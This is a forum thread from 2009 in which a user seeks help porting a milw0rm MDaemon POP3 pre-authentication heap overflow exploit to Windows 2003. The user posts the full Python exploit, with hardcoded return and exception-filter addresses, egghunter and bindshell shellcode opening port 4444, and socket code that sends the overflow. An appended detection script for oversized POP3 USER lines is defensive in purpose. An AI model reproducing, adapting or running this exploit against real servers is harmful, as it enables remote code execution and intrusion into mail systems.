[Question] How to find the ret & ueh addresses to exploit a Remote Heap Overflow bug 15/02/2009 03:19:29 (+0700) | #1 | 169430
caube12345
Member

Joined: 27/03/2007 10:49:25
Messages: 5
Hi everyone,
I know that different operating systems have different ret and ueh addresses for a given program (e.g. MDaemon here).
So how do you find the ret and ueh addresses in MDaemon on other operating systems?
Here is the link to the MDaemon POP3 Server < 9.06 exploit, http://milw0rm.com/exploits/2258, which targets Windows 2k.
I am looking for the ret and ueh addresses on Windows 2003.
Oh, and what address is this "ueh" address exactly? If anyone knows, please reply.
[Question] Re: How to find the ret & ueh addresses to exploit a Remote Heap Overflow bug 15/02/2009 03:47:01 (+0700) | #2 | 169433
TQN
Elite Member

Joined: 29/06/2006 22:28:01
Messages: 888
Location: Why would you want to know?
What is ueh? This is the first time I've heard of it.
[Question] Re: How to find the ret & ueh addresses to exploit a Remote Heap Overflow bug 15/02/2009 04:00:04 (+0700) | #3 | 169435
lamer
Elite Member

Joined: 26/02/2008 13:28:49
Messages: 215
It's UserExceptionHandler, TQN.
[Question] Re: How to find the ret & ueh addresses to exploit a Remote Heap Overflow bug 15/02/2009 04:07:14 (+0700) | #4 | 169438
caube12345
Member

Joined: 27/03/2007 10:49:25
Messages: 5

lamer wrote:
It's UserExceptionHandler, TQN.

I see, thanks a lot.

ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches

Seeing that line, I thought uef would be the right name.
But does anyone know how to find that address on Windows Server 2k3?
[Question] Re: How to find the ret & ueh addresses to exploit a Remote Heap Overflow bug 15/02/2009 10:10:03 (+0700) | #5 | 169485
TQN
Elite Member

Joined: 29/06/2006 22:28:01
Messages: 888
Location: Why would you want to know?
UserExceptionHandler or UnhandledExceptionHandler?
[Question] Re: How to find the ret & ueh addresses to exploit a Remote Heap Overflow bug 16/02/2009 09:51:05 (+0700) | #6 | 169596
lamer
Elite Member

Joined: 26/02/2008 13:28:49
Messages: 215
Ah yes, right. What TQN said is the correct name.

It is the default handler that gets invoked if no other handler handles the exception. Normally that is Dr Watson.
[Question] Re: How to find the ret & ueh addresses to exploit a Remote Heap Overflow bug 16/02/2009 15:12:50 (+0700) | #7 | 169623
caube12345
Member

Joined: 27/03/2007 10:49:25
Messages: 5
UnhandledExceptionHandler or SetUnhandledExceptionFilter?
I have found those two addresses (probably correct, because when testing on Windows 2k3 Server with MDaemon installed the program no longer crashes and MDaemon keeps running normally), but why doesn't port 4444 open?
Here is the code copied from milw0rm, with the ret and ueh addresses changed.
Code:
#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
########################################################################################
# MDaemon Pre Authentication (USER) Heap Overflow 
# Code based on Leon Juranic's exploit
# Coded by muts - mati@see-security.com
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# 	Mdaemon 9.0.5
# 	Mdaemon 7.2.3
# 	Mdaemon 7.2.2
# 	Mdaemon 7.2.1
# 	Mdaemon 7.2.0
#		Possibly Others
#		PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
########################################################################################
# Mdaemon is wierd. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shellcode - which then scans the memory, and executes a bindshell on port 4444.
# 
# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
# for which I unfortunately had no explenation. 
# I later found out that these machines were fully patched ...
# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to 
# todays' version, I noticed that the SetunhandledExceptionFilter function had changed, 
# and looks suspiciously similar to XP SP2... 
# Note that my unpatched win2k was last patched 2-3 weeks ago, 
# so I suspect this change is recent.
# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
#
# So, this is a partially working exploit, on unpatched win2k boxes....
# Kiddies, treat this exploit as DOS :)
#
# I got 3 types of results with this code:
#
# 1. Shell :)	
# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
# 3. Plain ugly crash - oh well.
#
# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
######################################################################################## 
# 
# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
# 
# C:\MDaemon\APP>
########################################################################################

host="192.168.1.4"

ret = struct.pack("<L",0x7D5BB5)	# 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches <-- I changed this to address 007D5BB5
ueh = struct.pack("<L",0x7C1F1CE)	# SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches <--- same here, 0x7C1F1CE
tap = struct.pack("<L",0xeb169090)  	# Short Jump over some garbage

# skape's egghunter shellcode 

egghunter  ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23"
egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f"
egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8"
egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum

shellcode  ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!)
shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x57"
shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48"
shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x38"
shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x53\x4b\x4d"
shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x38"
shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x46"
shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x47\x47\x43\x57"
shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50"
shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x34"
shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x51"
shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42"
shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x4f\x4f\x48\x4d"
shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x56"
shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45"
shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x4a\x46\x43\x46"
shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x49\x32\x4e\x4c"
shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x34\x4e\x42"
shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x55\x4c\x56"
shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f"
shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
shellcode +="\x4f\x4f\x42\x4d\x5a"

buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346

for x in range(5):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host,110))
	data=s.recv(1024)
	print data
	s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n') 
	s.send('QUIT\r\n')
	s.close()
	sleep(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
sleep(1)

# milw0rm.com [2006-08-26]


Anyone interested, please test it and see whether it works.



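The exploit posted above drives MDaemon's POP3 service with USER commands that carry thousands of bytes of filler, NOP bytes and raw shellcode. That traffic shape is easy to spot on the wire, because RFC 1939 restricts a POP3 argument to 40 printable-ASCII characters. The following Python is an added detection example for this thread; it is not part of the milw0rm code or of MDaemon, the sample stream is constructed, and the 255-byte alert threshold is an assumption chosen to avoid noise from merely long usernames.

```python
"""Flag POP3 command lines whose shape matches a USER-argument overflow:
oversized arguments, non-printable bytes and NOP-sled runs.

Added example for this thread (not the milw0rm exploit, not MDaemon code).
The sample stream below is constructed; the alert threshold is an assumption.
"""
from typing import Dict, List

# RFC 1939 allows at most 40 printable-ASCII characters per argument.
# Assumption: alert only well above that, so odd-but-legitimate logins stay quiet.
ALERT_ARG_LEN = 255
NOP_SLED = b"\x90" * 8  # eight consecutive x86 NOPs is already unusual in a username


def split_pop3_commands(stream: bytes) -> List[bytes]:
    """Split a client-to-server byte stream into CRLF-terminated command lines.

    An unterminated trailing fragment is kept, so a truncated capture is still
    inspected rather than silently dropped.
    """
    return [line for line in stream.split(b"\r\n") if line]


def inspect_command(line: bytes) -> Dict[str, object]:
    """Return a finding for one POP3 command line (keyword, argument size, reasons)."""
    parts = line.split(b" ", 1)
    keyword = parts[0].upper().decode("ascii", "replace")
    arg = parts[1] if len(parts) > 1 else b""

    reasons: List[str] = []
    if len(arg) > ALERT_ARG_LEN:
        reasons.append("oversized argument (%d bytes)" % len(arg))
    non_printable = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if non_printable:
        reasons.append("%d non-printable bytes" % non_printable)
    if NOP_SLED in arg:
        reasons.append("NOP sled pattern")

    return {
        "keyword": keyword,
        "arg_len": len(arg),
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


def scan_stream(stream: bytes) -> List[Dict[str, object]]:
    """Return only the suspicious findings for a whole client stream."""
    findings = (inspect_command(line) for line in split_pop3_commands(stream))
    return [f for f in findings if f["suspicious"]]


# Constructed sample: a benign login followed by a USER line shaped like the
# thread's payload (@A filler, a NOP run, trailing padding) and a clean QUIT.
SAMPLE_STREAM = (
    b"USER alice\r\n"
    b"PASS s3cret\r\n"
    b"USER " + b"@A" * 1600 + b"\x90" * 64 + b"D" * 300 + b"\r\n"
    b"QUIT\r\n"
)

if __name__ == "__main__":
    for finding in scan_stream(SAMPLE_STREAM):
        print(finding)
```

Running the block prints a single finding for the oversized USER line; the benign USER, PASS and QUIT lines produce nothing. In a real deployment the same checks would run over the client side of a port 110 session reassembled by the IDS, and the threshold would be tuned against the site's actual login traffic.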